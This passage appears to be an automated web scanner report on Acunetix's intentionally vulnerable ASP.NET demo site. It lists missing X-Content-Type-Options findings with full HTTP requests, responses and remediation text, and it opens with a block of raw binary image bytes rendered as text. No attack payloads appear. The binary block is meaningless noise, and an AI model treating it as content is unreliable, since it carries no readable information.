          ÒÒÒ111î|‚èCJèMT¼¼¼æææáááõ²µä$-êU[þüüAAA^^^æ:Bvvv>>>§§§â!÷ââímrá	ÁÁÁùÌκººìzŽŽŽ···ò•šTTTò«®í™kkk¸¸¸cccmmmï ìdjÃÃȈˆNNNœœœ"""ñ¿ÁìqvŠŠŠò¥§zzzttt888ñ‘–žžžšššØØØ™˜™ÕÕÕrssfffËËËýóóùññ÷æç÷ÝÝZZZ}}}FFFDDDó»½HHHçFM---¾¿¿æBISSS%%%```&&&†††„„„XXXâøÇÉxxx   JJJé_e***:::©¨¨ï€…âêioã$â!áæ/8ä(âùùù÷÷÷øøøÿþþÿÿþÿþÿþÿÿþþÿþÿþðððeeeõõõúûúíííóóó´´´°°°–––ùùúûúúúúûìììñññ÷÷øƒƒƒôôôûûúýýý÷ø÷ïïïµµµ”””òòòëëëêêê­­­øø÷¤¤¤èèèÌÌÌÍÍÍßßßÈÈȳ³³’’’ø÷ø¡¡¡ÇÇÇîî“²²²•••~~~   QQQùúú¥¥¥‚‚‚ùúù×××ÜÜÜÏÏÏ÷øøãããÝÝÝÆÆÆLLLöÑÓpppðŠ¢¢¢ûûüûøødddâââúÜÝ퉎ç@GÉÉÉÞÞÞþúúoooñðñò›ŸúûûOOOÝÜݑ‘‘ð†‹ûÝßôôõõõôúÙÚððñôÉËèHNâãâó¡îw|ë`fîqx톋äRQQôÆÈûßàíí˜óÝÞöÚÚúÏÑð­°ã&ñ´¶á{{{ÅÅÅøÞßöÁÂúúùûÞßûàâúêëùÓÔýïïöööûûûúúúþþþüüüá
          ÿÿÿ!ù, ÿ÷	H° Áƒ*\Ȱ¡Ã‡
          oÁ²Š` `rP€˜/O=~öé™§?zòDÊÉã¾>}Æ|Ó£>|þå8’'L›0ùÀŒyr'A˜=æÙóï_HžŠì¹ç?=2O†\º‡àÓ¡Mkº¬Jðþ¤Œi­?Jû>õˆsOב{|5µûÏI=ÿ~ÁãeC„,´s/ߦ›æÁ9r¤ã=V¹b&iÕ©È8û(|õsSÀž!k;§ë=û
          ügçß=}¬ÚÕc—©²hìޓĭ™¾§÷IæÚ'¬ÞȐ£A›Ó¯ºuën0X@½»÷ïàËÿO¾|xFÀÓFžÔ…†cæÿñëî䁛ëøñC(c>ߟA(WÞ>Lò‡ñ%ˆÇ)ŒäSžÿázÁu'`|F&ùuxEŒGÀÁÀÍhò-ÀƒÝЃg0TIdrxtgGòAS‘¨p£üSÁ.jØè§€gGSh;l°Â|ýÑ Q ¥Å2¬ðO3ìrÀ
          ÿ°"Ãü&d½2ÜD–€j7y|HeºåÖ¬¸UHdùÀ€¢Šæ
          d€ …!ݲZ€4•ÏhU±ÂY”:cwM¬A©[V4ÿٓ¾JÉ?¸uÈ?˜àV%‘Í’î@ö'	‚
          JÂ…B‡‰¯ºe‚¾úóhS„­¢;ÐT¦þlÚé§þ„*©á±­·@ÇI­hEQ-Z”Ò­ÑÞjˆ®M©â–‹@6†[G6uÈ&›lˆ‘é“‹´XÐð*9ֵ̋ÿl è8¼¢ƒðª1È?àŠ§ 6źh™€EBx0ï‘Ő¨	S"–xá¡üƒ	CT‹€ñϾhíÚÔnuÐT%nÁðώÿ¤ ðÖt™¿ñê!ðZ۔&Ҏ‚uSŸ€áOŽY2§'“kîÊn!Jd¯$ÿÊÀ¥ÿ<â€[–@·Hnafz4¥Óþ8ý-ä2ðÉ> åÀÈóP‡ÂrÈ¡ðÙ‘9ZbwWÀ¼FâáÞó…·ßjJwd(—«2ËöB'„[l4Ջ[SxGyË%4E¡zA.ù?©TÛLôÂ)ß?Ü
          ‡œPÄJ:M™R-à
          |ñЉzpgxs›ò¹hqIw1¸õCS­¸•
          ‹ #A…¨)q‘qt: -´¨2ü<D	Ð:yXÆ}<Ԇ¦XÂ-¨'õ¢Åå‰_Ýæ‡7¬amñDµPˆŸÑ‹8ÌawÀ
          5_‘Y„ÿՅÈð#¼†þa́m¨Ùá!pgnÙÛwJP­G©À-J#
          qg·Ý¡E‚Ì'fø?¤g[¯ÒB–׸6
          Òò„mà!8Pã#Àìñ6x	ø‡Üò
          ðPm}`óGÉÃMÝo…º£Ÿ?ÐØ5žðfiÙÀ@ÊRšg¨ÂþAÇ12tKŒÈ¡½/èða8xÈø(…[€bӘípËð!
          âó™Ï<½fͤGÅ$Äé<hâ¢Z«ÀÇ#Ðe‚	àcèLç þ@tž¢˜H ŽY·<㙡P—´aÿLB\ÀCÛÀ‡:$à#b>P+"4šø¸Å”‰
          ˆ€^ž€h&&ÀcRuЬ'ZڑÍmvó™ßDK8ñÁ@´t¢øè„ž‰‰‹ú£ô´ç1;q:/ j3Å!&˜Ÿ‚ÞªÁÒà!^Üá9p‹@ñÔªv
          ŠZÀS—à–! ªOÅG2üÑY<µWhÀ*‹!¢%O}Ä6ñÖ§š-”xª'jÅÔõ˜hAŒªÂUþ ÂZŸ*R<¬2hÙ…–f<âP‡‡ÖÑ.x(¤À€‡º!	Il!QþØA9œ1‰
          pbpYŃ$°¡·ÿ 
           *8´ˆ›ØDoýaGL`8°©?< F4bs
          ni%AŠ»¾…ØM&Z"€ƒà¡ÕÐlýÑ<Â¹Žp‹4Q‹Z4v›ÀC-¾èRój-AhD Ú¡aà!	»Î  þæ§xH0,(Å5-H0*Q¶(!û„qñF˜Àb(„±Í;HXÂÖ¥„„OEEÀU°!ZvŠSÀ­héІ–Q$¸µ
          &L€ô˜ xh‡|`‡ Àý A
          ìP¢æç
          vȲ~€ZJyÕ2„–íP‚‰nË8³tP6EEÿc&1Z<€5Û!ÕêÁ˜'8nÒvnÀx¿`ûcvFm=Œ‚1Á-;@‚Öú‹DH!
          Ÿë\ D<:ù¡ÔŠ
          t˜2@%D ‚3  c¶,Ô`1c0ÁZ®t–	À}nWŸ°ƒ+†m|´Æƒâ¡fZxAx†Qƒ
          [
          ˆE,*­k;dÆ@À1±‚V£vXv`Œ¨9U@Àˆkdú:qЅ>ö­)\AOà·>&Ÿ7\àEP¡‰
          ìûˆø¾ïK4á–H
          2AñƒS ‡8„(Ðq}\"â—Åè8">‰@”©8Â(
          0;”\à(ÆÃ#þ|x›çø ø#ô‡Nèãø!Á<ô‘ˆ¦ßÜÉø¹À9ø-ˆªÜêú¨º (nuEx}ß_¿¹Ó~sªoß^Çú¾µžˆ¬Ÿì‡„Üõ¡¹‡âsï83ވ|ä²à¿þðˆÏÇ;F €8\ÀºH¼ä'OùÊ[þò˜Ï¼æ7?y<ðãó ½èGOúқþô¨O½êWÏúÖ»þõ°½ìgOûÚÇ> ;
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        5. GET http://testaspnet.vulnweb.com/ads/def.html
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (355 bytes)
          GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (246 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/html
          Last-Modified: Fri, 24 May 2019 07:50:37 GMT
          Accept-Ranges: bytes
          ETag: "eb6cf45f512d51:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 488
          
          
          Response body (488 bytes)
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
          <html>
          	<head>
          		<title></title>
          		<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
          		<meta name="ProgId" content="VisualStudio.HTML">
          		<meta name="Originator" content="Microsoft Visual Studio .NET 7.1">
          	</head>
          	<body>
          		<P align="center"><STRONG>Is your website hackable?<BR>
          				check with<BR>
          				<IMG src="acunetix.gif"><BR>
          				Web Vulnerability Scanner</STRONG></P>
          	</body>
          </html>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        6. GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13707
          
          
          Response body (13707 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9zWSYY5iwxqgBHXlBfPJ/1TT/YMA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a>
          						<DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        7. GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 14245
          
          
          Response body (14245 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
